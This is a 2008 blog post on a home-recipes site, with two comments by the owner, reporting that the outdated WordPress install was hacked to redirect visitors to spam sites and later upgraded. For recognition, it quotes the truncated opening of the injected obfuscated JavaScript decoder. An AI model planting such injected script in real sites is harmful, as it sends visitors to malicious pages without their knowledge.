30 July 2008 ~ 2 Comments


Grrr! Homerecipes has been hacked. Too common an occurrence these days. Granted I’m running an old version of wordpress, so probably too many known vulnerabilities. The hack was not too bad, but unfortunately was redirecting you to spammy sites. Good thing google did not notice yet!

If you have not been able to access the site, I do apologize and it should now be fixed. If this happens to anyone else, here’s a piece of the offending script (in the header).

<script LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!115!99

Back to cooking now. And if anyone what has been up to, and no new post, it is not that I have lost interest. I have just been busy with lots of other projects, including a new barbecue 🙂

So more to come, hopefully later this year…


2 Responses to “Hacked!”

  1. 24 August 2008 at 10:30 pm Permalink

    Well, fixing the symptom is one thing, but fixing the real problem is really what one ought to do 🙂

    I’m not sure what vulnerability was used, but based on the list, the menu is far too broad to take an other chance.

    So I’ve upgraded to 2.6.1 and hopefully this site should stay clean now. The update was painless, except that I lost the Ultimate Tag Warrior plugin and no tags are displayed now. But presumably, wordpress itself does that a lot better now and no need to a plugin, or so the story goes

  2. 28 August 2008 at 9:44 pm Permalink

    Ahem, one more update. It looks like google _did_ notice after all as this site seems to be ranking for some unrelated pharmaceutical queries. Yuck! Google, please do something! Please…

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